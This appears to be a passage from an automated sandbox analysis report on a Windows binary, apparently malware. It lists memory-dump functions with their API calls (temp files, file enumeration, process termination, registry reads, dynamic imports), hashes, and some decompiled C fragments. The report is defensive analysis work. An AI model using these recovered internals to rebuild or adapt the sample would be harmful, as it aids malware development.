                                • Part of subcall function 053DD619: lstrcpy.KERNEL32(00000000), ref: 053DD68D
                              • lstrcpy.KERNEL32(-000000FC,00000000), ref: 053E2013
                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,053E3220,?,?,00000000,?,053C46AF,00000000), ref: 053E2025
                              • GetTickCount.KERNEL32 ref: 053E2030
                              • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,053E3220,?,?,00000000,?,053C46AF,00000000), ref: 053E203C
                              • lstrcpy.KERNEL32(00000000), ref: 053E2056
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                              • String ID: \Low
                              • API String ID: 1629304206-4112222293
                              • Opcode ID: 2a7228ee2f9ee9fcf89826465212850bfd548df5ec32c37ced88517c0a2c0e99
                              • Instruction ID: 0882f38e3c9028dadc5e182464af48ef33346ec1b6acda423ab86244a7638cf3
                              • Opcode Fuzzy Hash: 2a7228ee2f9ee9fcf89826465212850bfd548df5ec32c37ced88517c0a2c0e99
                              • Instruction Fuzzy Hash: 69018032211524ABD6326B65AC4EFAB7BDCAF05751F010525F512EE0C0DF64DD01C6B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DDC6E, Relevance: 9.2, APIs: 6, Instructions: 198timestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • FileTimeToLocalFileTime.KERNEL32(00000000,053C57F0), ref: 053DDCCD
                              • FileTimeToSystemTime.KERNEL32(053C57F0,?), ref: 053DDCDB
                              • lstrlenW.KERNEL32(00000010), ref: 053DDCEB
                              • lstrlenW.KERNEL32(00000218), ref: 053DDCF7
                              • FileTimeToLocalFileTime.KERNEL32(00000008,053C57F0), ref: 053DDDE4
                              • FileTimeToSystemTime.KERNEL32(053C57F0,?), ref: 053DDDF2
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                              • String ID:
                              • API String ID: 1122361434-0
                              • Opcode ID: b56b6ee8278ce744ca75c9a2ae5f0f9e811833d4fc4904d26c584eea863af09f
                              • Instruction ID: 33a5f51fa7ac9836b858f05b2b7c089641e1d52ebdf56fd5032702c0d6749ca5
                              • Opcode Fuzzy Hash: b56b6ee8278ce744ca75c9a2ae5f0f9e811833d4fc4904d26c584eea863af09f
                              • Instruction Fuzzy Hash: 6171EDB2A00219ABCB51DFA9D884AEEB7FCBF08304F144566F545E7241EB74EA45CB70
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C177F, Relevance: 9.1, APIs: 6, Instructions: 104stringsynchronizationCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053D34A4: lstrlen.KERNEL32(053CEFEF,747DF560,00000000,?,00000000,053DBF21,?,00000000,?,?,053CEFEF,00000020), ref: 053D34B3
                                • Part of subcall function 053D34A4: mbstowcs.NTDLL ref: 053D34CF
                              • lstrlenW.KERNEL32(00000000,?), ref: 053C17D2
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(?,00000000,747869A0,?,00000250,?,00000000), ref: 053DF68B
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(?,?,00000000), ref: 053DF697
                                • Part of subcall function 053DF63F: memset.NTDLL ref: 053DF6DF
                                • Part of subcall function 053DF63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 053DF6FA
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(0000002C), ref: 053DF732
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(?), ref: 053DF73A
                                • Part of subcall function 053DF63F: memset.NTDLL ref: 053DF75D
                                • Part of subcall function 053DF63F: wcscpy.NTDLL ref: 053DF76F
                              • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 053C17F3
                              • lstrlenW.KERNEL32(?), ref: 053C181D
                                • Part of subcall function 053DF63F: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 053DF795
                                • Part of subcall function 053DF63F: RtlEnterCriticalSection.NTDLL(?), ref: 053DF7CA
                                • Part of subcall function 053DF63F: RtlLeaveCriticalSection.NTDLL(?), ref: 053DF7E6
                                • Part of subcall function 053DF63F: FindNextFileW.KERNEL32(?,00000000), ref: 053DF7FF
                                • Part of subcall function 053DF63F: WaitForSingleObject.KERNEL32(00000000), ref: 053DF811
                                • Part of subcall function 053DF63F: FindClose.KERNEL32(?), ref: 053DF826
                                • Part of subcall function 053DF63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 053DF83A
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(0000002C), ref: 053DF85C
                              • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 053C183A
                              • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 053C1851
                              • PathFindFileNameW.SHLWAPI(0000001E), ref: 053C1866
                                • Part of subcall function 053CC627: lstrlenW.KERNEL32(?,?,00000002,00000000,?,?,?,053C187D,?,0000001E,?), ref: 053CC63C
                                • Part of subcall function 053CC627: lstrlenW.KERNEL32(?,?,?,?,053C187D,?,0000001E,?), ref: 053CC644
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                              • String ID:
                              • API String ID: 2670873185-0
                              • Opcode ID: 8f06006ee6d81c8b7d6d2902a692af13f47e9fd9077d1c6f5ea75f46472c428c
                              • Instruction ID: d120dbee45f51c40b7ea404282b3f6fa9b2ff3dc7b90496931ecbfeadcf7eaf7
                              • Opcode Fuzzy Hash: 8f06006ee6d81c8b7d6d2902a692af13f47e9fd9077d1c6f5ea75f46472c428c
                              • Instruction Fuzzy Hash: 26315972508305AFC711DF64D88886EBFEEFB88254F000A6DF48597252DB35DD05DBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DD4BA, Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON
                              Download Yara Rule
                              APIs
                              • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 053DD4D4
                              • CreateWaitableTimerA.KERNEL32(053F0244,00000003,?), ref: 053DD4F1
                              • GetLastError.KERNEL32(?,?,053C8C58,?), ref: 053DD502
                                • Part of subcall function 053E32FF: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3337
                                • Part of subcall function 053E32FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 053E334B
                                • Part of subcall function 053E32FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3365
                                • Part of subcall function 053E32FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,053C3136,?,?,?), ref: 053E338F
                              • GetSystemTimeAsFileTime.KERNEL32(?,00000000,053C8C58,?,?,?,053C8C58,?), ref: 053DD542
                              • SetWaitableTimer.KERNEL32(?,053C8C58,00000000,00000000,00000000,00000000,?,?,053C8C58,?), ref: 053DD561
                              • HeapFree.KERNEL32(00000000,053C8C58,00000000,053C8C58,?,?,?,053C8C58,?), ref: 053DD577
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                              • String ID:
                              • API String ID: 1835239314-0
                              • Opcode ID: 5d7ac3da5725298cc8d7899b4768705c2e1d85f85cd17c3ed75740a32fc8619b
                              • Instruction ID: 9be0ad0874b17d4f9ea0fc2caf955a9ee95d95406850403090459e7cb4d79287
                              • Opcode Fuzzy Hash: 5d7ac3da5725298cc8d7899b4768705c2e1d85f85cd17c3ed75740a32fc8619b
                              • Instruction Fuzzy Hash: CC311AB2910109FBCB21EF95E989CAEFFBAFB84394F108415F506EA140D774AA40CB70
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C55B3, Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                              Download Yara Rule
                              APIs
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?), ref: 053C55F2
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 053C5603
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000,?,?,?,?), ref: 053C561E
                              • GetLastError.KERNEL32(?,?,?,?), ref: 053C5634
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 053C5646
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 053C565B
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                              • String ID:
                              • API String ID: 1822509305-0
                              • Opcode ID: 10f5acb5b77fccfcc458783a330d21c477f7ebdc7a8bcce4ae63c3e4e2384211
                              • Instruction ID: bccfc37a7e63299bdd7d1ebb86d9e25df4c67a8b558c2f979aebaf69cb71c795
                              • Opcode Fuzzy Hash: 10f5acb5b77fccfcc458783a330d21c477f7ebdc7a8bcce4ae63c3e4e2384211
                              • Instruction Fuzzy Hash: 71116A76501128BBCF229A95DD0DCEFBFBEEF453A0F004061F505E9160DA719E61EBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C5CC5, Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON
                              Download Yara Rule
                              APIs
                              • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 053C5CED
                              • _strupr.NTDLL ref: 053C5D28
                              • lstrlen.KERNEL32(00000000), ref: 053C5D30
                              • TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 053C5D6F
                              • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 053C5D76
                              • GetLastError.KERNEL32 ref: 053C5D7E
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                              • String ID:
                              • API String ID: 110452925-0
                              • Opcode ID: 44592580f4b1e60219a5f7152d153c92c8111380fa359f7b4b7c267ede0a5149
                              • Instruction ID: 47c5f24305f44ab9239680782d1e2dcfda5e46c9cb49f92bcb6b509827e30c12
                              • Opcode Fuzzy Hash: 44592580f4b1e60219a5f7152d153c92c8111380fa359f7b4b7c267ede0a5149
                              • Instruction Fuzzy Hash: 5511BFB6510204BFDB21ABB49C8DDAE7FADFB88751F100459F903DA084EEB4AC448B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DEF2D, Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • LoadLibraryA.KERNEL32(?,00000000,00000001,00000014,00000020,053DC64E,00000000,00000001), ref: 053DEF4D
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053DEF6C
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053DEF81
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053DEF97
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053DEFAD
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053DEFC3
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AddressProc$AllocateHeapLibraryLoad
                              • String ID:
                              • API String ID: 2486251641-0
                              • Opcode ID: dc18a2bfa21c69eaba37fd80e2f88c20357c56365b9483cd8307646e50bdfa61
                              • Instruction ID: 04e8bf261b0ec2a68dac255d1fc868519ed4304ddaf0d4c7b282c2470ceb36b4
                              • Opcode Fuzzy Hash: dc18a2bfa21c69eaba37fd80e2f88c20357c56365b9483cd8307646e50bdfa61
                              • Instruction Fuzzy Hash: 4A11FEB220021BAF9720DBADECD9D67BBECFB54744B161925B516CF141EB60E8018B70
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DD619, Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD62B
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD644
                              • GetCurrentThreadId.KERNEL32 ref: 053DD651
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5,?,?,?,?,?,053C43B5,00000000), ref: 053DD65D
                              • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD66B
                              • lstrcpy.KERNEL32(00000000), ref: 053DD68D
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 1175089793-0
                              • Opcode ID: 4c964061d4fa942b5ab44ee73153ab74d5ef095515dbd8c3f9910de89984a57a
                              • Instruction ID: 2a4a20764da6cdf76c0c098063528145acd709a3f0b063cdf7427d0c7839fde0
                              • Opcode Fuzzy Hash: 4c964061d4fa942b5ab44ee73153ab74d5ef095515dbd8c3f9910de89984a57a
                              • Instruction Fuzzy Hash: F1018473A101146BD7215BAAAC8DE6BBFBCFBC1B40B450425B90ADB140DEA1E9008BB0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D976F, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ErrorLastmemset
                              • String ID: vids
                              • API String ID: 3276359510-3767230166
                              • Opcode ID: 77c551f34d9d95fed89b2310b250bfd9719342036e53d800cf8dc449b16d8d34
                              • Instruction ID: 1b9d3af3f473aa01560927f9636474b3519eeb9b1669310d8ba20b56a6d89791
                              • Opcode Fuzzy Hash: 77c551f34d9d95fed89b2310b250bfd9719342036e53d800cf8dc449b16d8d34
                              • Instruction Fuzzy Hash: F58118B2E102299FCF11DFA4D984AADBBB9FF08710F10856AF419EB250D7719A45CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CDCEE, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053CDD78
                              • lstrlen.KERNEL32(?,?), ref: 053CDDA9
                              • memcpy.NTDLL(00000008,?,00000001), ref: 053CDDB8
                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 053CDE37
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreelstrlenmemcpy
                              • String ID: W
                              • API String ID: 379260646-655174618
                              • Opcode ID: 4d541d9eb14282b093b2dae705582337b8aea518d76683795deef4ce409a4609
                              • Instruction ID: 9f3bec7e85eabf2eb4429e7a4c68963790a702c4aec52f77e33283469b8508b6
                              • Opcode Fuzzy Hash: 4d541d9eb14282b093b2dae705582337b8aea518d76683795deef4ce409a4609
                              • Instruction Fuzzy Hash: 2441D8B0904286DBCB259F1CD88C7A5BFAAFF55344F40887EF4468B651D7709D45CB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E467F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110COMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 053E472A
                              • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 053E4791
                              • GetLastError.KERNEL32(?,00000000,00000000), ref: 053E479B
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: BuffersErrorFileFlushLastmemset
                              • String ID: K$P
                              • API String ID: 3817869962-420285281
                              • Opcode ID: 08fa0bc41a96b24f5b0b6c3006f9ab6d0a97e188abf0622378ef374f15d3cdf9
                              • Instruction ID: ac1ef5a499aa08631c90d4067f2d804a3a46ba697386f859c6c399a6d4b0f959
                              • Opcode Fuzzy Hash: 08fa0bc41a96b24f5b0b6c3006f9ab6d0a97e188abf0622378ef374f15d3cdf9
                              • Instruction Fuzzy Hash: 98417C71A00715DFDF25CFA4C984AAEBBF6BF09700F55492DD4A6D3A80E774A904CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C1477, Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON
                              Download Yara Rule
                              APIs
                              • memcpy.NTDLL(?,053E12DD,00000000,?,?,?,053E12DD,?,?,?,?,?), ref: 053C14B5
                              • lstrlen.KERNEL32(053E12DD,?,?,?,053E12DD,?,?,?,?,?), ref: 053C14D3
                              • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 053C1542
                              • lstrlen.KERNEL32(053E12DD,00000000,00000000,?,?,?,053E12DD,?,?,?,?,?), ref: 053C1563
                              • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 053C1577
                              • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 053C1580
                              • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 053C158E
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrlenmemcpy$FreeLocal
                              • String ID:
                              • API String ID: 1123625124-0
                              • Opcode ID: 19a4217fcfdde2c26c4f07cf97c1f085232f64a3d059da33f1e7370981fe4bcc
                              • Instruction ID: b427fd950b827b56f9390fd3ddaf9c8658834dd1f11aeb5dd447fe2712d0e8e5
                              • Opcode Fuzzy Hash: 19a4217fcfdde2c26c4f07cf97c1f085232f64a3d059da33f1e7370981fe4bcc
                              • Instruction Fuzzy Hash: A741057280021AABCF11DF68EC4589B7FA8FF043A4F05446AFD05A7251E671EE20DBE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D4D70, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 37%
                              			E049D4D70() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x49dd35c; // 0x58195b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x49dd35c; // 0x58195b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x49dd35c; // 0x58195b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x49de823) {
					HeapFree( *0x49dd270, 0, _t10);
					_t7 =  *0x49dd35c; // 0x58195b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                              0x049d4d70
                              0x049d4d79
                              0x049d4d89
                              0x049d4d89
                              0x049d4d8e
                              0x049d4d93
                              0x00000000
                              0x00000000
                              0x049d4d83
                              0x049d4d83
                              0x049d4d95
                              0x049d4d9a
                              0x049d4d9e
                              0x049d4db1
                              0x049d4db7
                              0x049d4db7
                              0x049d4dc0
                              0x049d4dc2
                              0x049d4dc6
                              0x049d4dcc

                              APIs
                              • RtlEnterCriticalSection.NTDLL(05819570), ref: 049D4D79
                              • Sleep.KERNEL32(0000000A), ref: 049D4D83
                              • HeapFree.KERNEL32(00000000), ref: 049D4DB1
                              • RtlLeaveCriticalSection.NTDLL(05819570), ref: 049D4DC6
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                              • String ID: Uxt
                              • API String ID: 58946197-1536154274
                              • Opcode ID: 5d78bd229539f18865af50bce777f5e850431517fae87f1e304c59fc61846f64
                              • Instruction ID: 84bb856b90bb3eba0082094c56cdca388a6406ea01951587faf8741f0d147d76
                              • Opcode Fuzzy Hash: 5d78bd229539f18865af50bce777f5e850431517fae87f1e304c59fc61846f64
                              • Instruction Fuzzy Hash: C1F0FE7820A100EFEB189F68D949B257FB8EB14708B088139E902DB350D73CFC84DA11
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049DA90C, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 22%
                              			E049DA90C(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E049D55DC(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E049D6DFA(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E049D55DC((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x49dd2b0 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                              0x049da913
                              0x049da91a
                              0x049da91f
                              0x049da922
                              0x049da929
                              0x049da92c
                              0x049da92f
                              0x049da936
                              0x049da939
                              0x049daa8d
                              0x049daa8f
                              0x049daa91
                              0x049daa96
                              0x049daa96
                              0x049da93f
                              0x049da942
                              0x049da945
                              0x049da947
                              0x049da947
                              0x049da94b
                              0x00000000
                              0x00000000
                              0x049da94f
                              0x049da97b
                              0x049da980
                              0x049da982
                              0x049da982
                              0x049da985
                              0x049da988
                              0x049da988
                              0x049da98a
                              0x00000000
                              0x049da955
                              0x049da957
                              0x049da976
                              0x049da976
                              0x049da98d
                              0x049da98d
                              0x049da98e
                              0x049da98e
                              0x049da991
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049da991
                              0x049da95b
                              0x049da9a2
                              0x049da9a6
                              0x049daa80
                              0x049daa82
                              0x049daa82
                              0x049daa83
                              0x049daa86
                              0x00000000
                              0x049daa86
                              0x049da9af
                              0x049da9c0
                              0x049da9c4
                              0x049daa7c
                              0x00000000
                              0x049daa7c
                              0x049da9ca
                              0x049da9cd
                              0x049da9d1
                              0x049da9d7
                              0x049da9da
                              0x049daa72
                              0x049daa72
                              0x00000000
                              0x049daa78
                              0x049da9e5
                              0x049da9ee
                              0x049daa02
                              0x049daa09
                              0x049daa1e
                              0x049daa24
                              0x049daa2c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049daa2e
                              0x049daa2e
                              0x049daa2e
                              0x049daa35
                              0x049daa3d
                              0x00000000
                              0x00000000
                              0x049daa3f
                              0x049daa48
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049daa4a
                              0x049daa4c
                              0x049daa4f
                              0x049daa4f
                              0x049daa52
                              0x049daa56
                              0x049daa59
                              0x049daa5f
                              0x049daa62
                              0x049daa69
                              0x00000000
                              0x049da9e5
                              0x049da960
                              0x049da96b
                              0x049da96e
                              0x049da970
                              0x049da970
                              0x049da973
                              0x049da975
                              0x00000000
                              0x049da975
                              0x049da94f
                              0x049da995
                              0x049da99a
                              0x049da99c
                              0x049da99c
                              0x049da99f
                              0x049da99f
                              0x00000000

                              APIs
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • lstrcpy.KERNEL32(69B25F45,00000020), ref: 049DAA09
                              • lstrcat.KERNEL32(69B25F45,00000020), ref: 049DAA1E
                              • lstrcmp.KERNEL32(00000000,69B25F45), ref: 049DAA35
                              • lstrlen.KERNEL32(69B25F45), ref: 049DAA59
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                              • String ID:
                              • API String ID: 3214092121-3916222277
                              • Opcode ID: 4ac99ebc9524c1a1c9159befd071197007b1058be183a365e3848936e93d269c
                              • Instruction ID: 1af76badd520b2399f2595eef08eaeea30cfd43bf7616835a76008274de07471
                              • Opcode Fuzzy Hash: 4ac99ebc9524c1a1c9159befd071197007b1058be183a365e3848936e93d269c
                              • Instruction Fuzzy Hash: 11518E31A00208EFDF21CF99C5846ADBBBAFF45314F16C16AE8599B215C770BA61CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C7FC9, Relevance: 7.6, APIs: 6, Instructions: 122stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?,-053F010C,00000000,053E89BB), ref: 053C7FEB
                              • lstrlenW.KERNEL32(?,-053F010C,00000000,053E89BB), ref: 053C7FFC
                              • lstrlenW.KERNEL32(?,-053F010C,00000000,053E89BB), ref: 053C800E
                              • lstrlenW.KERNEL32(?,-053F010C,00000000,053E89BB), ref: 053C8020
                              • lstrlenW.KERNEL32(?,-053F010C,00000000,053E89BB), ref: 053C8032
                              • lstrlenW.KERNEL32(?,-053F010C,00000000,053E89BB), ref: 053C803E
                              Memory Dump Source
